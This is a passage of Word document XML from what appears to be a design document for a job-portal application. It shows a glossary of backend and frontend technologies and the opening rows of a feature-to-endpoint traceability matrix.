      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Data JPA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>An abstraction over Hibernate ORM reducing boilerplate data access code through automated repository interfaces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hibernate 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>An Object-Relational Mapping (ORM) framework that maps Java domain entities to SQL tables and manages persistence lifecycles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2 Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A fast, lightweight, Java-based in-memory relational database ideal for rapid local prototyping and automated testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Vite 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A next-generation frontend build tool leveraging native ES modules for instantaneous server starts and lightning-fast HMR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tailwind CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A utility-first CSS framework providing low-level styling classes directly in HTML/JSX for responsive, custom design systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Axios Interceptor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Middleware functions intercepting outgoing HTTP requests (to attach Bearer tokens) or incoming responses (to handle 401 errors).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>BCrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>An adaptive cryptographic password-hashing algorithm incorporating per-user salts to thwart rainbow table attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@Transactional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A Spring annotation declaring that a method executes within a database transaction boundary, rolling back on RuntimeException.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>N+1 Query Problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A performance anti-pattern where Hibernate executes 1 query to fetch parents and N queries to fetch lazy children. Solved using JOIN FETCH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DTO (Data Transfer Object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>An object carrying data between processes, preventing Mass Assignment vulnerabilities and circular JSON serialization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>37. End-to-End Traceability Matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>This matrix maps every functional capability directly to its corresponding frontend page, REST API endpoint, backend controller, service, repository, and database table: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930"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1930"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Frontend Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>API Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Controller / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Database Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>LoginPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AuthController -&gt; AuthService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>users, roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ProfilePage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET/PUT /api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfileController -&gt; ProfileService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>candidate_profiles, skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Job Catalog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobSearchPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /api/jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobController -&gt; JobService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>jobs, companies, categories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Skill Match Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobCard.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
